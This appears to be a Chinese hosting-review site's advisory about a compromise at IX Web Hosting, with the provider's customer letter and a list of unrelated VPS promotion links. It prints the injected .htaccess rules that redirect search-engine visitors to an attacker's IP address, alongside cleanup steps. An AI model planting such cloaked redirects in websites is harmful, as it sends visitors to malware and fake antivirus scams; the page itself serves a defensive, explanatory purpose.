关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- 疯狂猜成语 图猜成语一个锤子在打铁还有火苗是什么成语?全球[VPS测评]
- azvds→$1.3 月 1GB 内存 10GB NVME 空间 不限流虚拟空间(主机)
- STRATO→€1 月 512MB 内存 10GB SSD 空间 不限流虚拟空间(主机)
- Vultr Debian 8 及 Centos7 系统 VPS 安装破解全球[VPS测评]
- 腾讯云 阿里云 8 月特惠云服务器 2 核 4G 6M 带宽 1499 全球[VPS测评]
- php 获取文件名 文件路径 文件后缀名信息函数全球[VPS测评]
- 推荐 腾讯云最新秒杀活动→2G 内存云服务器 198 元 年 1G 内存全球[VPS测评]
- 活动 RAKsmart→机房升级 300G 防御 悬赏 100G 以上攻独立服务器[U]
- 新年促销 糖果主机→无限空间 无限流量虚拟主机 6 折起 VPS 年付 虚拟空间(主机)
- 淘宝特价版新人送 5 元,几分或几毛钱买实物全球[VPS测评]
- CloudCone→$17.5 年 KVM-1GB 20GB 1TB 洛全球[VPS测评]
- 闲话撸 10 京东卡全球[VPS测评]
- 哪种类型的网站最容易获得Adsense稳定收入?全球[VPS测评]
- WordPress删除文章时怎么才能删除缩略图及图片附件全球[VPS测评]
- Hosteur 瑞士VPS 2.99€ 月 1C2G25G硬盘 无限流量全球[VPS测评]
- Oblako 哈萨克斯坦 阿拉木图VPS (1Gbps10$)全球[VPS测评]
- Dihostingin-印度尼西亚 9.66$ 月 2C1G内存25G硬全球[VPS测评]
- 微基(idc.wiki)建站虚拟主机五折优惠 1G 113元三年全球[VPS测评]
- 快速云:vps云服务器的区别是什么?2022-08-1913:32来源:全球[VPS测评]
- 企鹅小屋:香港ntt vps,大带宽直连,1核/1G/2T流量/半年15香港VPS[主机]
- 7月份,经济复苏边际趋缓,央行降息幅度先稳后升全球[VPS测评]
- 拼多多拟建跨境电商平台:挖角SHEIN员工,0佣金招商入驻全球[VPS测评]
- 纳米云怎么样?纳米云香港vps,4核1G主机价格80元/月香港VPS[主机]
- 金斗云怎么样?香港CN2月付23元,圣何塞CN2月付22元香港VPS[主机]
- 日主机,便宜美国CN2高防VPS¥19/月起,1Gbps带宽,香港多IP站群服务器[IP]
- 2020畅行云双11活动:海内外云服务器超低1.5折,2核2G5M云主机全球[VPS测评]
- 云服务器和服务器各有什么优缺点?全球[VPS测评]
- Fatal error: Allowed memory size of 全球[VPS测评]
- 云计算的大门依旧没向雷军敞开全球[VPS测评]
- 啤啤云:美国圣何塞vps/香港安畅vps,GIA线路,全场9折终身优惠美国VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-112484.html











